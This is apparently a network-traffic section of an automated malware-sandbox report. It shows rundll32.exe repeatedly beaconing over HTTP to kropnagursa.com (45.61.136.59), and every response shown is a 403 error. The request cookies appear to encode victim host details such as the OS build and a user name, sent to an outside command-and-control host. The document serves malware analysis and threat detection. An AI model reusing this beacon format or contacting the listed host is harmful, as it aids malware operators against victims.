                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            80192.168.2.44977645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:47.375814915 CET2211OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:47.544250011 CET2211INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            81192.168.2.44977745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:47.854316950 CET2212OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:48.019141912 CET2213INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:47 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            82192.168.2.44977845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:48.386626959 CET2214OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:48.551610947 CET2214INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            83192.168.2.44977945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:48.859298944 CET2215OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:49.024195910 CET2215INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:48 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            84192.168.2.44978045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:49.569186926 CET2216OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:49.734395981 CET2217INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:49 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            85192.168.2.44978145.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:50.046238899 CET2217OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:50.211023092 CET2218INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            86192.168.2.44978245.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:50.610810041 CET2219OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:50.775465012 CET2219INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:50 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            87192.168.2.44978345.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:51.418057919 CET2220OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:51.585896015 CET2220INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            88192.168.2.44978445.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:51.893188953 CET2221OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:52.057910919 CET2222INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:51 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            89192.168.2.44978545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:53.337488890 CET2222OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:53.502639055 CET2223INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:53 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            9192.168.2.44970545.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:02.566757917 CET2119OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:02.731314898 CET2119INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:02 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            90192.168.2.44978645.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:53.822416067 CET2224OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:53.990360022 CET2224INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:53 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            91192.168.2.44978745.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:54.303980112 CET2225OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:54.471301079 CET2225INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:54 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            92192.168.2.44978845.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:54.804991007 CET2226OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:54.973000050 CET2227INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:54 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            93192.168.2.44978945.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:55.364800930 CET2227OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:55.530050039 CET2228INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:55 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                            Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                            94192.168.2.44979045.61.136.5980C:\Windows\System32\rundll32.exe
                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                            Feb 2, 2023 21:17:57.243174076 CET2229OUTGET / HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Cookie: __gads=2255569783:1:3857:110; _gat=10.0.17134.64; _ga=1.329303.0.5; _u=333035303930:6A6F6E6573:41413835424345334537373139363946; __io=0; _gid=67AFED6FC86C
                                                                                                                                            Host: kropnagursa.com
                                                                                                                                            Feb 2, 2023 21:17:57.408180952 CET2229INHTTP/1.1 403 Forbidden
                                                                                                                                            Server: nginx
                                                                                                                                            Date: Thu, 02 Feb 2023 20:17:57 GMT
                                                                                                                                            Content-Type: text/html
                                                                                                                                            Content-Length: 162
                                                                                                                                            Connection: keep-alive
